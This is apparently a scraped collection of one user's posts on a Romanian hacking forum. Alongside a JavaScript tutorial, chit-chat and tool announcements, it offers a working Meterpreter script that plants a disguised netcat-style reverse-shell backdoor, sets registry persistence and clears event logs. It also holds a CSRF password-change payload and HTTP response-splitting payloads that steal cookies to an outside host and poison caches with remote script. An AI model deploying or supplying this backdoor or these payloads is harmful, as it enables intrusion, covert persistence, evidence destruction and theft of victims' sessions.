Gonzalez

In Javascript, setTimeout() is a method of window object for timing event. It is used to trigger a function or an expression after a specified number of milliseconds. It returns a numeric timeout ID that can be canceled with the clearTimeout() method. Syntax var t = setTimeout("javascript expression", milliseconds); clearTimeout(t); //cancel the setTimeout() ID t Typical Use Set a number of time of delay on Javascript expression. var t = setTimeout("alert('Hello!')", 1000); Set a number of time of delay on Javascript function. The setTimeout function is usually at the end of the statements within the function. var t; function movee() { var elem = document.getElementById("box"); var spot = parseInt(elem.style.top); if (spot < 580) { spot+=16; elem.style.top=spot+"px"; } t = setTimeout(movee,100); } document.getElementById('box').style.top='180px' //Reset clearTimeout(t); //clear the setTimeout ID When the movee() function is triggered, the event is keeping running until the setTimeout ID is cleared by clearTimeout() method even though you reset the div box to its start position. To clear the setTimeout ID outsite the function, make sure the setTimeout ID a global scope variable. A Wrong Use The example below gives a common wrong use of setTimeout() method. The varible is a local variable while the expression alert(str) is an expression in global scope. Hence, it cannot see the local variable str. function foo() { var str = "hello"; setTimeout("alert(str);", 1000); } foo(); // returns str is undefined. When setTimeout is used in the Javascript object, the meaning that the keyword this stands for will change in the method contaning setTimeout because the setTimeout() method will change the context to global scope. And this will stands for window object rather than object instance. So the example below uses a global property _this to keep it consistant. function div(id) { this.id = id; this.t = 0; } div.prototype = { _this : "", init: function() { _this = this; }, move: function() { var elem = document.getElementById(_this.id); var spot = parseInt(elem.style.top); if (spot < 1700) { spot+=16; elem.style.top=spot+"px"; } _this.t = setTimeout(_this.move,100); } }; var m = new div("box1"); m.init(); m.move(); Object Bind method The use of _this makes it possible div object can be referred in setTimeout. A more generic way of keep this keyword consistant is using extended Bind method. To distingush the similar bind method used for Function object. Here I use capital for the initial letter B. Bind method uses apply method to return a method / function with its this keyword consistant to the object invoking it. div.prototype = { move: function() { var closure = this.Bind(this.move); var elem = document.getElementById(this.id); var spot = parseInt(elem.style.top); if (spot < 1600) { spot+=16; elem.style.top=spot+"px"; } this.t = setTimeout(closure,100); }, Bind: function( Method ){ var _this = this; return( function(){ return( Method.apply( _this, arguments ) ); } ); } }

Mersi pentru tutorial/link. -Gonzalez

Just got an email from Microsoft Technet (stupid win 7 beta) with some interesting info on a remote code execution that they are now patching, so people who don't pay attention to microsoft updates (Like I used to are still Vulnerable) Cumulative Security Update for Internet Explorer (978207) General Information Executive Summary This security update resolves seven privately reported vulnerabilities and one publicly disclosed vulnerability in Internet Explorer. The more severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for all supported releases of Internet Explorer: Internet Explorer 5.01, Internet Explorer 6, Internet Explorer 6 Service Pack 1, Internet Explorer 7, and Internet Explorer 8 (except Internet Explorer 6 for supported editions of Windows Server 2003). For Internet Explorer 6 for supported editions of Windows Server 2003 as listed, this update is rated Moderate. For more information, see the subsection, Affected and Non-Affected Software, in this section. The security update addresses these vulnerabilities by modifying the way that Internet Explorer handles objects in memory, validates input parameters, and filters HTML attributes. For more information about the vulnerabilities, see the Frequently Asked Questions (FAQ) subsection under the next section, Vulnerability Information. This security update also addresses the vulnerability first described in Microsoft Security Advisory 979352. Recommendation. The majority of customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871. For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service. See also the section, Detection and Deployment Tools and Guidance, later in this bulletin. Known Issues. None Source http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx Also be sure to check the link to see all of the copies of internet explorer that are vulnerable and if anyone has an exploit, feel free to share

sbd.rb uploads sbd.exe runs as svchost.exe with the settings that are entered ny attacker it autoruns via registry & autostarts as the script is run then clears system logs remeber it is a modded netcat for a reverse shell needs some more edits to script to hide the reg a little better but this will do till update time session = client host,port = session.tunnel_peer.split(':') #Menu-Options @@exec_opts = Rex::Parser::Arguments.new( "-r" => [ true, "Resporn time limit." ], "-p" => [ true, "Port Number to open." ], "-k" => [ true, "Authentication name."], "-h" => [ true, "Local ip address."] ) def usage print_line("Sbd Configuration Meterpreter Script by Intern0t.net") print_line(" Michael Johnson (Zero Cold) mjog123@hotmail.com ") print_line("####################################################") print(@@exec_opts.usage) raise Rex::Script::Completed end #Files to upload to target host ncexe = File.join(Msf::Config.install_root, "data", "sbd.exe") #Function to upload files def upload(session,file) location = session.fs.file.expand_path("%SystemRoot%\\system32") fileontrgt = "#{location}\\#{"svhost"}.exe" print_status("Uploading #{file}....") session.fs.file.upload_file("#{fileontrgt}","#{file}") print_status("#{file} Uploaded!") return fileontrgt end #Function to execute sbd def sbdrun(session,time,auth,port,ip) location = session.fs.file.expand_path("%SystemRoot%\\system32") session.sys.process.execute("cmd /c #{location}\\svhost.exe -q -r #{time} -k #{auth} -e cmd.exe -D on -p #{port} #{ip}", nil, {'Hidden' => true, 'Channelized' => false}) print_status("Local Ip Sbd Will Connect Back On: #{ip}") print_status("Local Port Sbd Will Connect Back On: #{port}") print_status("Pass Phrase: #{auth}") print_status("Respawn Time: #{time}") end #Fuction to add registry for sbd def regadd(session,time,auth,port,ip) location = session.fs.file.expand_path("%SystemRoot%\\system32") print_status("Adding to Registry ...") session.sys.process.execute("cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /f /v Microsoft /d \"#{location}\\svhost.exe\ -q -r #{time} -k #{auth} -e cmd -D on -p #{port} #{ip}\"", nil, {'Hidden' => true, 'Channelized' => false}) print_status("Successfully added to Registry ...") end def clrevtlgs(session) evtlogs = [ 'security', 'system', 'application', 'directory service', 'dns server', 'file replication service' ] begin evtlogs.each do |evl| log = session.sys.eventlog.open(evl) log.clear end rescue ::Exception => e print_status("Error clearing Event Log: #{e.class} #{e}") end end #Menu-Imput time = nil port = nil ip = nil auth = nil @@exec_opts.parse(args) { |opt, idx, val| case opt when "-r" time = val when "-p" port = val when "-h" ip = val when "-k" auth = val end } if port upload(session,ncexe) sbdrun(session,time,auth,port,ip) regadd(session,time,auth,port,ip) clrevtlgs(session) else usage end Video: http://www.youtube.com/watch?v=imFAm3AxOuc

BackTrack 4 Final was launched a few weeks back with a better compilation of security tools and bugfixes. For those who have never heard of BackTrack, you might want to start by reading up on the history and purpose of this Linux distro. Here is a simple HOWTO guide which I compiled while installing BT4 into my VMWare Workstation. PART 1 : Setting Up The VM * VMWare Workstation > File > New > Virtual Machine. * Select Typical (Recommended) configuration > Next. * Select the iso file > Guest Operating System : Linux Operating System > Version : Other Linux 2.6.x kernel. * Name the VM as BackTrack. * Allocated 8GB of disk space > Set it as Store Virtual Disk as a single file > Click on Finish when you are ready. PART 2 : The Installation * Boot up the image. * Select Start BackTrack FrameBuffer (1024 x 768). * BT4 starts initializing files and configurations. * At the root prompt, type in “startx” no quotes and press enter to access the desktop. (You are currently in Live CD mode and the installation has yet to take place) * Once you have the desktop, double click on install.sh and that will kick start the installation. The installation begins by asking you for your regional settings. Select as appropriate and follow through the on screen instructions. Once the installation completes, it will prompt for you for a restart. Just proceed! Backtrack should now be up and running. Have fun.

In sfarsit a iesit si Backtrack 4 final Description: Image Download Name:: bt4-final.iso Size: 1570 MB MD5: af139d2a085978618dc53cabc67b9269 Download: http://www.backtrack-linux.org/download.php?fname=bt4f

Asa nu faci niciodata bani pe net. Evident iti trebuie o idee buna. Toata lumea asta vrea sa faca bani. Programe gen: affiliate sunt cele mai bune. -Gonzalez

Cred ca e cea mai buna varianta de a practica fara a cumpara un router. DI-624 Chetnet Unofficial Ntlworld Forums - powered by vBulletin D-LINK SYSTEMS, INC | WIRELESS ROUTER | SETUP Netgear Emulators Index of /files ::: DrayTek Corp - Your reliable networking solutions partner - Support - Live Web Demo ::: NETGEAR France - TELECHARGEMENTS : Liste Interfaces TRENDnet Product Emulators -Gonzalez

NetCrack is a cluster software developed to distribute an hashing algorithm's cracking process work using the brute force attack. NetCrack works like a client/server application, where the server is unique for each cluster network and its job is to distribuites the cracking process work, coordinates the nodes and prevents connections and data integrity errors. Using a TCP/IP based protocol to estabilish and manage the connection, NetCrack widens its domain to the entire web, avoiding complexity in terms of network implementation and cost, allowing any system to contribuite. The protocol has been made simple and universal to facilitate future supports and to allow the coding of alternate client software using any programming language. Site: http://www.salvatorefresta.net/?opt=tools Download: http://www.salvatorefresta.net/files/tools/NetCrack-1.0.tar.gz -Gonzalez

Ai venit pe forum sa speri copilasi? -Gonzalez

Author: Connection What is CSRF? ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~ CSRF (Cross-Site Request Forgery) is a vulnerability found in web applications which allow a remote attacker to create a special web page or email which, when viewed by an authenticated viewer on a remote site, will execute a particular script. The script executed could range from creating usernames with administrative access, changing the admins (or any other user's) password, creating content on the site, deleting content on the site, and any other action that a user with an authenticated session might be able to do. How do I find CSRF Vulnerabilities? ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~ This is an interactive tutorial on finding CSRF Vulnerabilities using a demo CMS from http://demo.opensourcecms.com. At the time of this writing the vulnerability exists on Dubsite CMS 1.0 but the vendor has been alerted to this and thus I cannot verify that at the time this is written the vulnerability will exist. The tools I use to find CSRF vulnerabilties are Firefox Web Browser, the Tamper Data Firefox Plug-in, and Notepad++ (or any other text-editor). Step 1: visit http://demo.opensourcecmd.com/dubsite/index.php/login and login with the following credentials: Username: admin Password: demo123 Step 2: Navigate to the user control panel of the admin page located at http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts Step 3: We are now going to attempt to modify the administrator's password. Click on edit and fill in the data you want. Before you click submit, start tamper data to sniff the requests. Now make a note of the parameters passed to the website. Mine look like this: The stuff we interested in are the URL up top and all the POST parameters in the right window. Open up your favorite text-editor and copy down all these values. Step 4: Here comes the fun part, we are going to create our evil URL. We have to combine our base url with our post parameters. Our base URL is the URL we copied from tamper data. In this case our base URL is : http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1 When we append POST parameters to a base URL we start with adding a ? to the base URL and then combine parameters by linking them with a &. An example is http://base.url/goes/here?first=parameter&second=parameter A more specific example is for our Dubsite CMS base URL: http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=test123&userpassword2=test123&role_id=1&active=1&update=Update As you can see we send the data back to the server the same way our browser sent it. This example URL will edit the administrator account's password and change it to test123. Step 5: Now we have a few methods of getting the authenticated administrator to execute this command. First of all we could make a website and set it like this: <html> <head> </head> <body> <img src = "http://demo.opensourcecms.com/dubsite/index.php/admin/users/accounts/edit/1?username=admin&userpassword=test123&userpassword2=test123&role_id=1&active=1&update=Update" /> </body> </html> When the web browser views the page it will send the link to the admin's site trying to get the information for the image which will in turn execute the change password feature. Another way to get the admin to execute the command is to email the admin with the <img> tag trick in the body of the email. Opening the email will cause the server to try to grab the image and will execute the change password function. Conclusion ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~ CSRF vulnerabilities could cause a lot of harm to a system admin because the form does not have some sort of validation token in place to make sure the administrator is actually issuing the command. A technique that will stop many attackers is to add HTTP_REFERER checking to the page with the form. Coming from an email or other website, the request for the form will be either blanked out or wrong and thus tip off the admin to what is going on. Combined with session tokens for making sure each visit to the form is unique, this will stop attackers from attacking your site via CSRF techniques. Bonus Points ~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~_¯~ The create user function is also vulnerable to CSRF attacks. For more practice try to exploit it and create your own administrator user.

Author: Raimond HTTP Splitting Tutorial Contents 1.0 What is HTTP Splitting 2.0 Attack Methodology 2.1 Vulnerable Scripts 2.2 Attack Payloads 3.0 Securing Code 4.0 End 1.0 What is HTTP Splitting HTTP Splitting (or HTTP Response Splitting) is method of attacking web applications by exploiting poor input validation and by taking advantage of the HTTP protocol. HTTP Splitting occurs when a attacker inputs arbitrary headers to control the server response. It can be used to deliver many attack payloads such as web cache poisoning, XSS, hijacking the page data, and other client side attacks. 2.0 Attack Methodology To perform a HTTP splitting attack the CR (Command Return. Also represented by %0d and \r) and LF (Line Feed. Also represented by %0a and \n) characters must be used to forge the servers response by injecting headers. Here is an example of a normal request to a example login script: Request: POST /login.php HTTP/1.1 Host: site.com User-Agent: Mozilla/5.06 Accept: text/html Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.site.com/login.php Cookie: test_cookie=1234 Content-Type: text/html Content-Length: 98 username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2F Response: HTTP/1.x 302 Found Location: http://www.site.com/admin/ Date: Tue, 29 Dec 2009 16:12:01 GMT Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.6 Set-Cookie: test_cookie=1234; path=/ Last-Modified: Tue, 29 Dec 2009 16:12:01 GMT Keep-Alive: timeout=1, max=10000 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Now, the part of the request we are interested in is the post content (It is URL encoded. You can decode it for better viewing at http://meyerweb.com/eric/tools/dencoder/): username=USER&password=PASS&submit=Login&redirect=http%3A%2F%2Fwww.site.com%2Fadmin%2F Notice the redirect parameter. This parameter is put into the server's response headers: HTTP/1.x 302 Found Location: http://www.site.com/admin/ <--- User Input We can use the for our advantage by modifying the redirect parameter. 2.1 Vulnerable Scripts As you already know any script that uses user input in the server's response headers is vulnerable. Many web services do this is the form of a redirect and in some cases, setting a cookie. Below are two vulnerable code examples. Setting Cookies in PHP: <?php $name = $_GET['name']; $session = "sup3rs3cr3tsessiondata"; setcookie("session", $session); setcookie("name", $name); ?> User's Request: http://www.site.com/setcookie.php?name=Raimond Server's Response: HTTP/1.1 200 OK Content-type: text/html Set-Cookie: session=sup3rs3cr3tsessiondata; name=Raimond <--- User Input Redirecting in PHP: <?php header("Location: $_GET['page'];"); ?> User's Request: http://www.site.com/redirect.php?redirect=http://www.newsite.com Server's Response: HTTP/1.x 302 Found Location: http://www.newsite.com/ <--- User Input We will cover these attacking these scripts in the next section. I encourage you to install a web server (I run apache) and run these scripts to get a better understanding of HTTP Splitting. Note that PHP 5.1.2+ has been secured against HTTP Response Splitting thanks to the PHP Hardening Project! (Asp and other server languages are still vulnerable) 2.2 Injecting Payloads Ok. Lets move onto injecting our headers. To create a new response we can fully control we must end the genuine response by using Content-Length: 0. If you know anything about HTTP you know that Content-Length: 0 tells the browser that there is nothing left to read (No HTML to parse) from the servers response. We can inject our Content-Length by using one set of raw CRLF symbols. Here is an example. Normal Request http://www.site.com/redirect.php?page=Content-Length%3a%200 1njected! http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200 (This is URL encoded. Use URL Decoder/Encoder to decode it.) %0d%0aContent-Length%3a%200 is the same as \r\nContent-Length: 0. The \r\n (or %0d%0a in URL encoding) are the CR and LF characters. Think of these characters as the "\n" character in c++ or the result of pressing enter on your keyboard while running a word processor. Here is an example of what happens in the HTTP response after submitting a normal request and a injected request. Normal Response HTTP/1.1 302 Found Location: Content-Length: 0 Injected! HTTP/1.1 302 Found Location:(our CRLF characters made a newline) Content-Length: 0 Now we can start a forged HTTP response! http://www.site.com/redirect.php?page=%0d%0aContent-Length%3a%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type%3a%20text/html%0d%0aContent-Length%3a%2020%0d%0a%0d%0a%3Chtml%3EHacked%3C%2Fhtml%3E (Again this is encoded. Decode it for better viewing.) Response (\r\n represents where we injected the %0d%0a CRLF characters) HTTP/1.1 302 Found Location:\r\n Content-Length: 0\r\n \r\n HTTP/1.1 200 OK\r\n Content-Type: text/html\r\n Content-Length: 20\r\n \r\n <html>Hacked</html> OK! We can change the servers response! Whats so great about this? Well, with HTTP Response Splitting we can deliver many attack payloads which I will cover in the next section. XSS And Other Client Side Attacks Well this should be straight forward. Just replace "<html>Hacked</html>" in the previous example with your attack payload. Don't forget to change the Content-Length to the length of your payload. Cookie Stealing Payload http%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%20120%0D%0A%0D%0A%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.cookiejar.com%2Fcookies.php%3Fcookie%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E%0A HTTP Response HTTP/1.1 302 Found Location:\r\n Content-Length: 0\r\n \r\n HTTP/1.1 200 OK\r\n Content-Type: text/html\r\n Content-Length: 120\r\n \r\n <script>document.location="http://www.cookiejar.com/cookies.php?cookie="+document.cookie;</script> If you don't understand this script you need to learn XSS. Of course other client side attacks such as phishing, forging pages, internal scanning/discovery, CSRF can be executed through HTTP Splitting. Cache Poisoning Before I explain cache poisoning I will explain how web cache's work. The web cache is a storage bank for web pages and pictures. By using a web cache the user doesn't have to reconnect to the server everytime it revisits a page. The user's browser can just grab the saved page from the local cache as long as the server doesn't report that there is a newer version of the page available (if the page has been modified the browser will grab the new version of the page). So here's the scenario: You login to your homepage and your browser caches it. The pages response headers look like so: HTTP/1.x 302 Found Location: http://www.site.com/user/home.htm Last-Modified: Tue, 29 Dec 2009 16:00:00 GMT Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.6 Set-Cookie: test_cookie=1234; path=/ Keep-Alive: timeout=1, max=10000 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Content-Length: 200 <html>[Content Here]</html> Note the Last-Modified header! Then the next day you login and the response look like so: HTTP/1.x 302 Found Location: http://www.site.com/user/home.html Last-Modified: Wed, 30 Dec 2009 12:00:00 GMT Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.6 Set-Cookie: test_cookie=1234; path=/ Keep-Alive: timeout=1, max=10000 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Content-Length: 200 <html>[Content Here]</html> The Last-Modified header has been changed to a later date thus your browser updates it's cache with the new page. We can exploit this behavior by setting the Last-Modified date to a date in the far future (Last-Modified: Sun, 1 Jan 2050 12:00:00 GMT). By doing so the browser will cache the page and not update it until the date on the Last-Modified header or until the cache is cleared! We can use HTTP Splitting to forge a page and control it everytime the user browses to it! Cache Poisoning Request http%3A%2F%2Fwww.site.com%2Fredirect.php%3Fpage%3D%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Sun%2C%201%20Jan%202050%2012%3A00%3A00%20GMT%0D%0AContent-Length%3A%20100%0D%0A%0D%0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.evilsite.com%2Fevil.js%22%3E%3C%2Fscript%3E%0D%0A Response (Don't forget \r\n stands for the CRLF or %0d%0a characters we injected) HTTP/1.1 302 Found Location:\r\n Content-Length: 0\r\n \r\n HTTP/1.1 200 OK\r\n Content-Type: text/html\r\n Last-Modified: Sun, 1 Jan 2050 12:00:00 GMT\r\n Content-Length: 100\r\n \r\n <script src="http://www.evilsite.com/evil.js"></script> Note the Last-Modified header. Since we set the last modified header to a future date (40 years from now) the browser will not update its cache until then or until cache is cleared! Everytime the victim visits the injected page our payload will execute. The payload in this example is a remote js. The remote js file can be coded to do anything the attackers wants. An ideal attack would be to launch a xss shell and perform further attacks from there. Since we control data on the page we can forge data, phish credentials, and copy the html contents! Many more client-side attacks can be executed because of the control we have over the html. This ends the Attack Payloads section. Remember to think outside the box when performing HTTP Splitting. Many things can be done with it! 3.0 Securing Code Securing in PHP: Upgrade to newest version Wink! Securing in ASP: Use EnableHeaderChecking Property to encode the CR and LF characters. 4.0 End Well this is goodbye. I hope you enjoyed and understood the tutorial. Please give suggestions and comments for enhancing the quality of this tut. Thanks! Resources: http://h4k.in/encoding/ http://meyerweb.com/eric/tools/dencoder/ http://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol

Freddie Gibbs - Just Tryin' Ta Make It.mp3 -Gonzalez

Tutoriale in engleza Tutoriale in limba engleza Cadorui moka se dau la Off-Topic. Fara suparare. -Gonzalez

Chucky. -Gonzalez

Mersi pentru informatii v1c. -Gonzalez

Sarbatori fericite la toti. Sa va aduca mosu sanatate si tot ce va doriti. Amin. -Gonzalez

Par interesante, mersi. -Gonzalez

pr0n sau forum pentru a ajuta oamenii cu probleme in securitate, bug-uri etc. eventual contra cost. -Gonzalez

Oricum nu va fi ce a fost. Ma bucur pentru ei, bravo lor. -Gonzalez

-Gonzalez

Din pacate nu am putut sa vad Cronica Carcotasilor, dar imi place ultima parte a emisiuni: Cronica Carcotasilor - 2 decembrie 2009 (part.9) -Gonzalez

Votul pentru Obreja Maria Teodora a fost înregistrat. Mul?umim! -Gonzalez

Frumoasa e scrisoare de incurajare. Se pare ca vom lupta din nou impotriva coruptiei si a comunismului. Asta este soarta noastra, asa este neamul nostru, nivelul IQ este sub medie din pacate, suntem niste boschetari in jungla de beton, in paralel cu boschetarii din Africa. Cine e destept scapa din Romania. E si normal sa iesi din tara nu? Sau unii dintre voi mai au ganduri bune, sa mearga la faculta sa studiez, BLA BLA BLA. Aceleasi lucruri se vor intampla din nou, din nou vom trai in saracie indiferent cine ar iesi presedinte. Nu mai vreau sa comentez momentan acest subiect ca imi pusca capu de la atatia nervi. P.S: Bun subiect de discutie. -Gonzalez

4 Non Blondes - What's Up.mp3 -Gonzalez